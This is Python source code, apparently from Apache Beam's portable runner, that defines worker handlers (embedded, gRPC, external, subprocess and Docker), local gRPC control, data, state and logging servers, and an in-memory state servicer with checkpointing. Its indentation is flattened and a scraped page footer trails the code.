worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError(
'All workers communicate through gRPC should have '
'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
_LOGGER.debug(
'Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
_LOGGER.debug(
'Runner: Requests multiplexing info: %s',
[(str(req), worker)
for req, worker in self._req_worker_mapping.items()])
def GetProcessBundleDescriptor(self, id, context=None):
return self._worker_manager.get_process_bundle_descriptor(id)
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {} # type: Dict[str, Tuple[ConstructorFn, type]]
_worker_id_counter = -1
_lock = threading.Lock()
control_conn = None # type: ControlConnection
data_conn = None # type: data_plane._GrpcDataChannel
def __init__(self,
control_handler,
data_plane_handler,
state, # type: StateServicer
provision_info # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
# type: () -> None
self.stop_worker()
def start_worker(self):
# type: () -> None
raise NotImplementedError
def stop_worker(self):
# type: () -> None
raise NotImplementedError
def data_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def state_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
def logging_api_service_descriptor(self):
# type: () -> Optional[endpoints_pb2.ApiServiceDescriptor]
raise NotImplementedError
@classmethod
def register_environment(
cls,
urn, # type: str
payload_type # type: Optional[Type[T]]
):
# type: (...) -> Callable[[Callable[[T, StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]], Callable[[T, StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]]
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls,
environment, # type: beam_runner_api_pb2.Environment
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> WorkerHandler
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self,
unused_payload, # type: None
state, # type: sdk_worker.StateHandler
provision_info, # type: Optional[ExtendedProvisionInfo]
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self # type: ignore # need Protocol to describe this
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.bundle_processor_cache = sdk_worker.BundleProcessorCache(
SingletonStateHandlerFactory(
sdk_worker.CachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
worker_manager._process_bundle_descriptors)
self.worker = sdk_worker.SdkWorker(
self.bundle_processor_cache,
state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
# type: () -> None
pass
def stop_worker(self):
# type: () -> None
self.bundle_processor_cache.shutdown()
def done(self):
# type: () -> None
pass
def data_api_service_descriptor(self):
# type: () -> None
return None
def state_api_service_descriptor(self):
# type: () -> None
return None
def logging_api_service_descriptor(self):
# type: () -> None
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(beam_provision_api_pb2_grpc.ProvisionServiceServicer
):
def __init__(self, base_info, worker_manager):
# type: (Optional[beam_provision_api_pb2.ProvisionInfo], WorkerHandlerManager) -> None
self._base_info = base_info
self._worker_manager = worker_manager
def GetProvisionInfo(self, request, context=None):
# type: (...) -> beam_provision_api_pb2.GetProvisionInfoResponse
info = copy.copy(self._base_info)
if context:
worker_id = dict(context.invocation_metadata())['worker_id']
worker = self._worker_manager.get_worker(worker_id)
info.logging_endpoint.CopyFrom(worker.logging_api_service_descriptor())
info.artifact_endpoint.CopyFrom(worker.artifact_api_service_descriptor())
info.control_endpoint.CopyFrom(worker.control_api_service_descriptor())
return beam_provision_api_pb2.GetProvisionInfoResponse(info=info)
class EmptyArtifactRetrievalService(
beam_artifact_api_pb2_grpc.LegacyArtifactRetrievalServiceServicer):
def GetManifest(self, request, context=None):
return beam_artifact_api_pb2.GetManifestResponse(
manifest=beam_artifact_api_pb2.Manifest())
def GetArtifact(self, request, context=None):
raise ValueError('No artifacts staged.')
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self,
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
worker_manager, # type: WorkerHandlerManager
):
# type: (...) -> None
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(UnboundedThreadPoolExecutor())
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer(worker_manager)
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(
self.provision_info.provision_info, worker_manager),
self.control_server)
if self.provision_info.artifact_staging_dir:
service = artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir
) # type: beam_artifact_api_pb2_grpc.LegacyArtifactRetrievalServiceServicer
else:
service = EmptyArtifactRetrievalService()
beam_artifact_api_pb2_grpc.add_LegacyArtifactRetrievalServiceServicer_to_server(
service, self.control_server)
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
artifact_service.ArtifactRetrievalService(
file_reader=filesystems.FileSystems.open),
self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer(
DATA_BUFFER_TIME_LIMIT_MS)
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
GrpcStateServicer(state), self.state_server)
self.logging_server = grpc.server(
UnboundedThreadPoolExecutor(), options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(), self.logging_server)
_LOGGER.info('starting control server on port %s', self.control_port)
_LOGGER.info('starting data server on port %s', self.data_port)
_LOGGER.info('starting state server on port %s', self.state_port)
_LOGGER.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self,
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler,
self._grpc_server.data_plane_handler,
state,
provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def control_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.control_port))
def artifact_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.control_port))
def data_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
# type: () -> endpoints_pb2.ApiServiceDescriptor
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
# type: () -> None
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self,
external_payload, # type: beam_runner_api_pb2.ExternalPayload
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(ExternalWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._external_payload = external_payload
def start_worker(self):
# type: () -> None
_LOGGER.info("Requesting worker at %s", self._external_payload.endpoint.url)
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
control_descriptor = endpoints_pb2.ApiServiceDescriptor(
url=self.control_address)
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=control_descriptor,
artifact_endpoint=control_descriptor,
provision_endpoint=control_descriptor,
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
# type: () -> None
pass
def host_from_worker(self):
# TODO(BEAM-8646): Reconcile across platforms.
if sys.platform in ['win32', 'darwin']:
return 'localhost'
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: bytes
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(EmbeddedGrpcWorkerHandler,
self).__init__(state, provision_info, grpc_server)
from apache_beam.transforms.environments import EmbeddedPythonGrpcEnvironment
config = EmbeddedPythonGrpcEnvironment.parse_config(payload.decode('utf-8'))
self._state_cache_size = config.get('state_cache_size') or STATE_CACHE_SIZE
self._data_buffer_time_limit_ms = \
config.get('data_buffer_time_limit_ms') or DATA_BUFFER_TIME_LIMIT_MS
def start_worker(self):
# type: () -> None
self.worker = sdk_worker.SdkHarness(
self.control_address,
state_cache_size=self._state_cache_size,
data_buffer_time_limit_ms=self._data_buffer_time_limit_ms,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
# The subprocesses module is not threadsafe on Python 2.7. Use this lock to
# prevent concurrent calls to POpen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
worker_command_line, # type: bytes
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(SubprocessSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
# type: () -> None
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
@WorkerHandler.register_environment(
common_urns.environments.DOCKER.urn, beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: beam_runner_api_pb2.DockerPayload
state, # type: StateServicer
provision_info, # type: Optional[ExtendedProvisionInfo]
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(DockerSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._container_image = payload.container_image
self._container_id = None # type: Optional[bytes]
def host_from_worker(self):
if sys.platform == "darwin":
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
else:
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
# type: () -> None
with SUBPROCESS_LOCK:
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
_LOGGER.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output([
'docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
assert self._container_id is not None
while True:
status = subprocess.check_output([
'docker', 'inspect', '-f', '{{.State.Status}}', self._container_id
]).strip()
_LOGGER.info(
'Waiting for docker to start up.Current status is %s' %
status.decode('utf-8'))
if status == b'running':
_LOGGER.info(
'Docker container is running. container_id = %s, '
'worker_id = %s',
self._container_id,
self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call(['docker', 'container', 'logs', self._container_id])
raise RuntimeError(
'SDK failed to start. Final status is %s' %
status.decode('utf-8'))
time.sleep(1)
self._done = False
t = threading.Thread(target=self.watch_container)
t.daemon = True
t.start()
def watch_container(self):
while not self._done:
status = subprocess.check_output(
['docker', 'inspect', '-f', '{{.State.Status}}',
self._container_id]).strip()
if status != b'running':
if not self._done:
logs = subprocess.check_output([
'docker', 'container', 'logs', '--tail', '10', self._container_id
],
stderr=subprocess.STDOUT)
_LOGGER.info(logs)
self.control_conn.abort(
RuntimeError(
'SDK exited unexpectedly. '
'Final status is %s. Final log line is %s' % (
status.decode('utf-8'),
logs.decode('utf-8').strip().split('\n')[-1])))
time.sleep(5)
def stop_worker(self):
# type: () -> None
self._done = True
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call(['docker', 'kill', self._container_id])
class WorkerHandlerManager(object):
"""
Manages creation of ``WorkerHandler``s.
Caches ``WorkerHandler``s based on environment id.
"""
def __init__(self,
environments, # type: Mapping[str, beam_runner_api_pb2.Environment]
job_provision_info # type: Optional[ExtendedProvisionInfo]
):
# type: (...) -> None
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(
list) # type: DefaultDict[str, List[WorkerHandler]]
self._workers_by_id = {} # type: Dict[str, WorkerHandler]
self.state_servicer = StateServicer()
self._grpc_server = None # type: Optional[GrpcServer]
self._process_bundle_descriptors = {}
def register_process_bundle_descriptor(self, process_bundle_descriptor):
self._process_bundle_descriptors[
process_bundle_descriptor.id] = process_bundle_descriptor
def get_process_bundle_descriptor(self, request):
return self._process_bundle_descriptors[
request.process_bundle_descriptor_id]
def get_worker_handlers(
self,
environment_id, # type: Optional[str]
num_workers # type: int
):
# type: (...) -> List[WorkerHandler]
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
# special case for EmbeddedWorkerHandler: there's no need for a gRPC
# server, but we need to pass self instead. Cast to make the type check
# on WorkerHandler.create() think we have a GrpcServer instance.
grpc_server = cast(GrpcServer, self)
elif self._grpc_server is None:
self._grpc_server = GrpcServer(
self.state_servicer, self._job_provision_info, self)
grpc_server = self._grpc_server
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment,
self.state_servicer,
self._job_provision_info.for_environment(environment),
grpc_server)
_LOGGER.info(
"Created Worker handler %s for environment %s",
worker_handler,
environment)
self._cached_handlers[environment_id].append(worker_handler)
self._workers_by_id[worker_handler.worker_id] = worker_handler
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
_LOGGER.error(
"Error closing worker_handler %s" % worker_handler, exc_info=True)
self._cached_handlers = {}
self._workers_by_id = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
def get_worker(self, worker_id):
return self._workers_by_id[worker_id]
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer,
sdk_worker.StateHandler):
class CopyOnWriteState(object):
def __init__(self, underlying):
# type: (DefaultDict[bytes, Buffer]) -> None
self._underlying = underlying
self._overlay = {} # type: Dict[bytes, Buffer]
def __getitem__(self, key):
# type: (bytes) -> Buffer
if key in self._overlay:
return self._overlay[key]
else:
return StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
# type: (bytes) -> None
self._overlay[key] = []
def commit(self):
# type: () -> DefaultDict[bytes, Buffer]
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self,
underlying, # type: DefaultDict[bytes, Buffer]
overlay, # type: Dict[bytes, Buffer]
key # type: bytes
):
# type: (...) -> None
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
# type: () -> Iterator[bytes]
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
# type: (bytes) -> None
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
StateType = Union[CopyOnWriteState, DefaultDict[bytes, Buffer]]
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._state = collections.defaultdict(list) # type: StateServicer.StateType
self._checkpoint = None # type: Optional[StateServicer.StateType]
self._use_continuation_tokens = False
self._continuations = {} # type: Dict[bytes, Tuple[bytes, ...]]
def checkpoint(self):
# type: () -> None
assert self._checkpoint is None and not \
isinstance(self._state, StateServicer.CopyOnWriteState)
self._checkpoint = self._state
self._state = StateServicer.CopyOnWriteState(self._state)
def commit(self):
# type: () -> None
assert isinstance(self._state,
StateServicer.CopyOnWriteState) and \
isinstance(self._checkpoint,
StateServicer.CopyOnWriteState)
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
# type: () -> None
assert self._checkpoint is not None
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = b'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', b'%s:0' % token_base
else:
token_base, index = continuation_token.split(b':')
ix = int(index)
full_state_cont = self._continuations[token_base]
if ix == len(full_state_cont):
return b'', None
else:
return full_state_cont[ix], b'%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
@staticmethod
def _to_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
# type: (StateServicer) -> None
self._state = state
def State(self,
request_stream, # type: Iterable[beam_fn_api_pb2.StateRequest]
context=None
):
# type: (...) -> Iterator[beam_fn_api_pb2.StateResponse]
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id, append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id, clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
# type: (sdk_worker.CachingStateHandler) -> None
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> sdk_worker.CachingStateHandler
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
# type: () -> None
"""Does nothing."""
pass
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
self._exception = None
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response and not self._exception:
with self._condition:
if not self._response and not self._exception:
self._condition.wait(timeout)
if self._exception:
raise self._exception
else:
return self._response
def abort(self, exception):
with self._condition:
self._exception = exception
self._condition.notify_all()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.